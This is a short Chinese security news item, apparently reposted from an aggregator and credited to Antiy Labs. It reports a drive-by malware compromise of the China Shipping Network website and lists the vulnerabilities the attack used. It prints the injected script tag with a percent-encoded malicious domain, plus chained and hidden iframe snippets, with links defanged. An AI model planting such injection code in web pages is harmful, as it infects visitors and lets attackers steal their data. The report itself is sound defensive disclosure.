zoukankan      html  css  js  c++  java

  • 中国航运网遭遇挂马 黑客悄悄植入病毒 狼人:

    中国航运网(hxxp://www.zhongguohangyun.com/)被黑客植入病毒,用户如果访问该网页,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。

    该网站问题代码:

     

     

    <script src=hxxp://%6D%62%72%33%2E%63%6E></script>

    hxxp://mbr3.cn/问题框架代码:

     

     

    <iframe src=hxxp://www.wansf.net/a11/a11.htm></iframe>

    hxxp://www.wansf.net/a11/a11.htm问题框架代码:

     

     

    <iframe src=new.html  height=0  width=100 ></iframe>

    hxxp://www.wansf.net/a11/new.html问题框架代码

     

    该挂马网页通过以下几个漏洞进行传播:

    联众世界GLWorld HanGamePluginCn18类ActiveX控件栈溢出漏洞

    MS08-041漏洞

    暴风影音2 mps.dll组件多个缓冲区溢出漏洞

    MS06-014漏洞

    Adobe Flash Player SWF文件漏洞

    MS09-002漏洞

    RealPlayer播放器IERPCtl.IERPCtl.1漏洞

    百度搜霸ActiveX控件远程代码执行漏洞

    【注:基于安全考虑,所有网络链接“http”均已被替换为“hxxp”,特此说明。】

    【资料来源:安天实验室】

  • 相关阅读:
    第36课 经典问题解析三
    第35课 函数对象分析
    67. Add Binary
    66. Plus One
    58. Length of Last Word
    53. Maximum Subarray
    38. Count and Say
    35. Search Insert Position
    28. Implement strStr()
    27. Remove Element
  • 原文地址:https://www.cnblogs.com/waw/p/2202747.html
Copyright © 2011-2022 走看看